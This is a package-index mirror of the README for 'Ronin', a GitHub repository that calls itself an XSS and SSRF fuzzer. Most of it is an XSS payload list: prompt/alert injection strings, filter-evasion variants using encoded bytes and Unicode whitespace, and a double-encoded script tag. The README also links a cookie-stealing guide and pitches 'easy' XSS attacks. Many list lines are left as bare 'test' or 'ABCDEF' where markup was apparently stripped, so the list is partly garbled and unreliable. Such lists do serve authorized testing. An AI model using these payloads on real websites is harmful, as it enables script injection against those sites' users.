https://github.com/byt3n33dl3/ronin

🔱 Ronin the Shogun, WebApp parameter analysis and fuzzer for XSS and SSRF.
https://github.com/byt3n33dl3/ronin

crlf cross-site-request-forgery cross-site-scripting injection-attacks ronin ssrf xss

Last synced: 8 months ago
JSON representation

🔱 Ronin the Shogun, WebApp parameter analysis and fuzzer for XSS and SSRF.

Host: GitHub
URL: https://github.com/byt3n33dl3/ronin
Owner: byt3n33dl3
License: artistic-2.0
Created: 2024-03-29T16:52:12.000Z (about 2 years ago)
Default Branch: main
Last Pushed: 2024-09-08T09:29:25.000Z (over 1 year ago)
Last Synced: 2025-10-12T06:38:13.559Z (8 months ago)
Topics: crlf, cross-site-request-forgery, cross-site-scripting, injection-attacks, ronin, ssrf, xss
Language: C
Homepage: https://ronin.my.io
Size: 456 KB
Stars: 14
Watchers: 0
Forks: 4
Open Issues: 0
Metadata Files:
- Readme: README.md
- Changelog: CHANGELOG
- License: LICENSE

Awesome Lists containing this project

README

          [![Downloads](https://img.shields.io/badge/Download-Windows%20Build-blue.svg)](https://github.com/pxcs/Ronin/releases)

[![License](https://img.shields.io/badge/License-Artistic%20v2%2B-blue.svg)](https://github.com/github.com/pxcs/Ronin/assets/LICENSE)

# Ronin the shogun










# Installation

```shell

git clone https://github.com/pxcs/Ronin.git

cd ronin

python2 ronin.py

```

[here!](https://github.com/pxcs/Ronin/) --> this tool / software is provided for educational and research purpose only. The author of this project are no way responsible for any misuse of **ronin**.


> - [What is XSS](https://www.owasp.org/index.php/Cross-site_Scripting_(XSS))

> - [Steal cookie with XSS Attack](https://security.stackexchange.com/questions/49185/xss-cookie-stealing-without-redirecting-to-another-page)

- [How to use XSS](https://canyoupwn.me/tr-how-to-use-xss/)

## The automatic XSS injection attack

ronin will help you to make an easy Cross-Site Scripting ( XSS ) attacks, this are a type of injection, in which malicious scripts are injected into otherwise benign and `trusted` websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.

XSS Manual Script


```plaintext

'"-prompt(8)-"

'-prompt(8)-'

";a=prompt,a()//

';a=prompt,a()//

'-eval("window ")-'

"-eval("window ")-"

"onclick=prompt(8)>"@x.y

"onclick=prompt(8)>"@x.y







t>

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

'`"><\x3Cscript>javascript:alert(1)        

'`"><\x00script>javascript:alert(1)



\x3Cscript>javascript:alert(1)

'"`>/* *\x2Fjavascript:alert(1)// */

javascript:alert(1)javascript:alert(1)javascript:alert(1)javascript:alert(1)

-->  -->

-->

-->

-->

`"'>
a='hello\x27;javascript:alert(1)//';

test

test

test

test

test

test

test

test

test

test

test

test

test

test

/* *\x2A/javascript:alert(1)// */

/* *\x00/javascript:alert(1)// */

"'`>ABC
DEF 

"'`>ABCDEF 

%253Cscript%253Ealert('XSS')%253C%252Fscript%253E

if("x\\xE1\x96\x89".length==2) { javascript:alert(1);}

if("x\\xE0\xB9\x92".length==2) { javascript:alert(1);}

if("x\\xEE\xA9\x93".length==2) { javascript:alert(1);}

'`"><\x3Cscript>javascript:alert(1)

'`"><\x00script>javascript:alert(1)

"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>

"'`><\x00img src=xxx:x onerror=javascript:alert(1)>

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

javascript:alert(1);

ABC
DEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

ABCDEF

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

test

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

`"'>

"`'>\x3Bjavascript:alert(1)

"`'>\x0Djavascript:alert(1)

"`'>\xEF\xBB\xBFjavascript:alert(1)

"`'>\xE2\x80\x81javascript:alert(1)

"`'>\xE2\x80\x84javascript:alert(1)

"`'>\xE3\x80\x80javascript:alert(1)

"`'>\x09javascript:alert(1)

"`'>\xE2\x80\x89javascript:alert(1)

"`'>\xE2\x80\x85javascript:alert(1)

"`'>\xE2\x80\x88javascript:alert(1)

"`'>\x00javascript:alert(1)

"`'>\xE2\x80\xA8javascript:alert(1)

"`'>\xE2\x80\x8Ajavascript:alert(1)

"`'>\xE1\x9A\x80javascript:alert(1)

"`'>\x0Cjavascript:alert(1)

"`'>\x2Bjavascript:alert(1)

"`'>\xF0\x90\x96\x9Ajavascript:alert(1)

"`'>-javascript:alert(1)

"`'>\x0Ajavascript:alert(1)

"`'>\xE2\x80\xAFjavascript:alert(1)

"`'>\x7Ejavascript:alert(1)

"`'>\xE2\x80\x87javascript:alert(1)

"`'>\xE2\x81\x9Fjavascript:alert(1)

"`'>\xE2\x80\xA9javascript:alert(1)

"`'>\xC2\x85javascript:alert(1)

"`'>\xEF\xBF\xAEjavascript:alert(1)

"`'>\xE2\x80\x83javascript:alert(1)

"`'>\xE2\x80\x8Bjavascript:alert(1)

"`'>\xEF\xBF\xBEjavascript:alert(1)

"`'>\xE2\x80\x80javascript:alert(1)

"`'>\x21javascript:alert(1)

"`'>\xE2\x80\x82javascript:alert(1)

"`'>\xE2\x80\x86javascript:alert(1)

"`'>\xE1\xA0\x8Ejavascript:alert(1)

"`'>\x0Bjavascript:alert(1)

"`'>\x20javascript:alert(1)

"`'>\xC2\xA0javascript:alert(1)

"/>

"/>

"/>

"/>

"/>

```



# Thanks to:

- MaXe

- payloadbox

ecosyste.ms

Data

Tools

Indexes

Applications

Experiments

Awesome

https://github.com/byt3n33dl3/ronin

Awesome Lists containing this project

README

XSS Manual Script